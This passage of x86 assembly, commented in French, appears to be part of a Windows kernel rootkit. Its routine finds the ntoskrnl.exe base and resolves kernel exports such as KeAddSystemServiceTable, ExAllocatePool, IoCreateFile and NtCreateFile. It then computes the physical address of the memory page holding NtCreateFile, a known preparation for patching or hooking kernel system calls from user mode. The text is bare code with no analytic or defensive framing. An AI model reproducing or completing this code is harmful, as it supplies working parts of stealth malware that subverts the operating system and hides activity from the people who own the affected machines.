
    resultat                    dd 0
    buffer                      dd 0

; *******************************************************************
; *                            CODE                                 *
; *******************************************************************

get_ntoskrnl_info :
        pushad
        
        push offset resultat
        push 0
        push 0
        push SystemModuleInformation
        call dword ptr [@NtQuerySystemInformation]

; Ce 1er NtQuerySystemInformation  vide renvoie dans "rsultat"
; la longueur du buffer qu'il faut initialiser
        
        mov eax,[resultat]
        add eax,01000h      ; Arrondie  la page
        and eax, 0FFFFF000h ; au dessus


        push eax            ; sauve long InfoSystem

        push PAGE_READWRITE
        push MEM_COMMIT
        push eax
        push 0
        call VirtualAlloc

        mov dword ptr [buffer],eax

        pop eax             ; rcupaire long InfoSystem 

        push offset resultat

        push eax 
        push [buffer]
        push SystemModuleInformation
        call dword ptr [@NtQuerySystemInformation]
        mov eax,[buffer]
        add eax,4               ; passe le compteur de Modules
ASSUME eax: ptr SYSTEM_MODULE_INFORMATION_ENTRY                
        mov esi,[eax].Base      ; sauve l'ImageBase du 1er Module (toujours ntoskrnl.exe)
        mov dword ptr [IBS_ntoskrnl],esi
        mov ebx, esi
        and ebx, 0FFFh
        mov dword ptr [page_ntoskrnl_offset], ebx
        mov ebx, [eax]._Size     
        mov dword ptr [size_ntoskrnl],ebx
ASSUME eax: nothing  

        push MEM_RELEASE
        push 0
        push dword ptr [buffer]
        call VirtualFree

        mov eax, esi
        mov ebx, offset ntoskrnl_physical_address
        call virtual2physical 

        push offset ntoskrnl    
        call LoadLibraryA
        mov edi, eax
        or eax,eax
        je get_ntoskrnl_info_sortie_erreur

        mov [IB_ntoskrnl],edi
        mov ebp, esi
        sub ebp, edi
        mov dword ptr [ntoskrnl_offset], ebp

; ----------------------------------------------

        mov eax, offset KeAddSystemServiceTable

        call GetNtoskrnlProcAddress
        or eax,eax
        je get_ntoskrnl_info_sortie_erreur        

        mov dword ptr dword ptr [@KeAddSystemServiceTable],eax

; ----------------------------------------------

        mov eax, offset ExAllocatePool

        call GetNtoskrnlProcAddress
        or eax,eax
        je get_ntoskrnl_info_sortie_erreur 
        
        mov dword ptr [@ExAllocatePool],eax

; ----------------------------------------------

        mov eax,offset ExFreePool        
        
        call GetNtoskrnlProcAddress
        or eax,eax
        je get_ntoskrnl_info_sortie_erreur  
        
        mov dword ptr [@ExFreePool],eax

; ----------------------------------------------

        mov eax,offset IoCreateFile        
        
        call GetNtoskrnlProcAddress
        or eax,eax
        je get_ntoskrnl_info_sortie_erreur  
        
        mov dword ptr [@IoCreateFile],eax

; ----------------------------------------------

        mov eax,offset t_NtCreateFile
        
        call GetNtoskrnlProcAddress
        or eax,eax
        je get_ntoskrnl_info_sortie_erreur  

        mov ebx, eax
        and eax, 0FFFFF000h
        mov dword ptr [page_NtCreateFile], eax
        and ebx, 000000FFFh
        mov dword ptr [page_NtCreateFile_offset], ebx

        mov eax, dword ptr [page_NtCreateFile]
        mov ebx, offset NtCreateFile_physical_address
        call virtual2physical 

; ----------------------------------------------

        push edi
        call FreeLibrary

        mov eax, STATUS_SUCCESS
get_ntoskrnl_info_sortie :
        mov dword ptr [esp+_eax], eax
        popad
        ret
get_ntoskrnl_info_sortie_erreur :
        push dword ptr [IB_ntoskrnl]
        call FreeLibrary
        mov eax, STATUS_ERROR   
        jmp get_ntoskrnl_info_sortie   














